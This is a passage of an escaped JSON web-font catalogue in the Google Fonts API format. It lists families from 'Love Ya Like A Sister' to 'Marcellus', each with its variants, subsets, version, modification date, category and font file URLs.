\"http://fonts.gstatic.com/s/loveyalikeasister/v16/R70EjzUBlOqPeouhFDfR80-0FhOqJubN-Be78nZcsGGycA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Loved by the King\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lovedbytheking/v17/Gw6gwdP76VDVJNXerebZxUMeRXUF2PiNlXFu2R64.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lovers Quarrel\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/loversquarrel/v21/Yq6N-LSKXTL-5bCy8ksBzpQ_-zAsY7pO6siz.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Luckiest Guy\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/luckiestguy/v18/_gP_1RrxsjcxVyin9l9n_j2RStR3qDpraA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lusitana\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lusitana/v13/CSR84z9ShvucWzsMKxhaRuMiSct_.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lusitana/v13/CSR74z9ShvucWzsMKyDmaccqYtd2vfwk.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lustria\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lustria/v13/9oRONYodvDEyjuhOrCg5MtPyAcg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Luxurious Roman\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/luxuriousroman/v3/buEupou_ZcP1w0yTKxJJokVSmbpqYgckeo9RMw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Luxurious Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/luxuriousscript/v5/ahcCv9e7yydulT32KZ0rBIoD7DzMg0rOby1JtYk.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"M PLUS 1\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5VSe78nZcsGGycA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW51Sa78nZcsGGycA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5Cya78nZcsGGycA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5VSa78nZcsGGycA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5Zya78nZcsGGycA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5iyG78nZcsGGycA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5siG78nZcsGGycA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW51SG78nZcsGGycA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5_CG78nZcsGGycA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"M PLUS 1 Code\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7iN0XHpapwmdZhY.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7gN0HHpapwmdZhY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7jT0HHpapwmdZhY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7iN0HHpapwmdZhY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7i_0HHpapwmdZhY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7hT13HpapwmdZhY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7hq13HpapwmdZhY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"M PLUS 1p\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"hebrew\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/mplus1p/v27/e3tleuShHdiFyPFzBRrQnDQAUW3aq-5N.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQVBYge0PWovdU4w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mplus1p/v27/e3tjeuShHdiFyPFzBRro-D4Ec2jKqw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQDBcge0PWovdU4w.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQRBEge0PWovdU4w.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQWBIge0PWovdU4w.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQfBMge0PWovdU4w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"M PLUS 2\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwOa-VxlqHrzNgAw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwua6VxlqHrzNgAw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwZ66VxlqHrzNgAw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwOa6VxlqHrzNgAw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwC66VxlqHrzNgAw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkw56mVxlqHrzNgAw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkw3qmVxlqHrzNgAw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwuamVxlqHrzNgAw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwkKmVxlqHrzNgAw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"M PLUS Code Latin\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1EbB6i5MqF9TRwg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1MbA6i5MqF9TRwg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1BjA6i5MqF9TRwg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1EbA6i5MqF9TRwg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1HTA6i5MqF9TRwg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1JjH6i5MqF9TRwg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1KHH6i5MqF9TRwg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"M PLUS Rounded 1c\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"hebrew\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGCAYIAV6gnpUpoWwNkYvrugw9RuM3ixLsg6-av1x0.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0q5psKxeqmzgRK.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGEAYIAV6gnpUpoWwNkYvrugw9RuPWGzr8C7vav.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM1y55sKxeqmzgRK.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM064ZsKxeqmzgRK.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0m4psKxeqmzgRK.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/mplusrounded1c/v15/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0C45sKxeqmzgRK.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ma Shan Zheng\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mashanzheng/v10/NaPecZTRCLxvwo41b4gvzkXaRMTsDIRSfr0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Macondo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/macondo/v21/RrQQboN9-iB1IXmOS2XO0LBBd4Y.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Macondo Swash Caps\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/macondoswashcaps/v20/6NUL8EaAJgGKZA7lpt941Z9s6ZYgDq6Oekoa_mm5bA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mada\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/mada/v18/7Au_p_0qnzeSdf3nCCL8zkwMIFg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mada/v18/7Au_p_0qnzeSdZnkCCL8zkwMIFg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mada/v18/7Auwp_0qnzeSTTXMLCrX0kU.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mada/v18/7Au_p_0qnzeSdcHlCCL8zkwMIFg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mada/v18/7Au_p_0qnzeSde3iCCL8zkwMIFg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mada/v18/7Au_p_0qnzeSdYnjCCL8zkwMIFg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/mada/v18/7Au_p_0qnzeSdbHhCCL8zkwMIFg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Magra\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/magra/v14/uK_94ruaZus72k5xIDMfO-ed.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/magra/v14/uK_w4ruaZus72nbNDxcXEPuUX1ow.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Maiden Orange\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/maidenorange/v25/kJE1BuIX7AUmhi2V4m08kb1XjOZdCZS8FY8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Maitree\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrklhGNWJGovLdh6OE.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrklnWOWJGovLdh6OE.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/maitree/v10/MjQGmil5tffhpBrkrtmmfJmDoL4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrkli2PWJGovLdh6OE.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrklgGIWJGovLdh6OE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/maitree/v10/MjQDmil5tffhpBrklmWJWJGovLdh6OE.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Major Mono Display\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/majormonodisplay/v12/RWmVoLyb5fEqtsfBX9PDZIGr2tFubRhLCn2QIndPww.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mako\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mako/v18/H4coBX6Mmc_Z0ST09g478Lo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mali\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QOLlKlRaJdbWgdY.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj8wlVQIfTTkdbJYA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QIbmKlRaJdbWgdY.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj8plZQIfTTkdbJYA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/mali/v9/N0ba2SRONuN4eCrODlxxOd8.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/mali/v9/N0bU2SRONuN4SCjECn50Kd_PmA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QN7nKlRaJdbWgdY.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj8_ldQIfTTkdbJYA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QPLgKlRaJdbWgdY.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj80lBQIfTTkdbJYA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/mali/v9/N0bV2SRONuN4QJbhKlRaJdbWgdY.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/mali/v9/N0bX2SRONuN4SCj8tlFQIfTTkdbJYA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mallanna\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mallanna/v13/hv-Vlzx-KEQb84YaDGwzEzRwVvJ-.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mandali\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mandali/v14/LhWlMVbYOfASNfNUVFk1ZPdcKtA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Manjari\",\n      \"variants\": [\n        \"100\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"malayalam\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/manjari/v9/k3kSo8UPMOBO2w1UdbroK2vFIaOV8A.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/manjari/v9/k3kQo8UPMOBO2w1UTd7iL0nAMaM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/manjari/v9/k3kVo8UPMOBO2w1UdWLNC0HrLaqM6Q4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Manrope\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk59FO_F87jxeN7B.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk6jFO_F87jxeN7B.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk79FO_F87jxeN7B.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk7PFO_F87jxeN7B.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk4jE-_F87jxeN7B.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk4aE-_F87jxeN7B.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/manrope/v13/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk59E-_F87jxeN7B.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Mansalva\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/mansalva/v12/aWB4m0aacbtDfvq5NJllI47vdyBg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Manuale\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeG6e7wD1TB_JHHY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeHke7wD1TB_JHHY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeHWe7wD1TB_JHHY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeE6fLwD1TB_JHHY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeEDfLwD1TB_JHHY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeFkfLwD1TB_JHHY.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOApA3zRdIWHYr8M.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOFRA3zRdIWHYr8M.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOGZA3zRdIWHYr8M.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOIpH3zRdIWHYr8M.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOLNH3zRdIWHYr8M.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/manuale/v23/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsONRH3zRdIWHYr8M.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Marcellus\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": 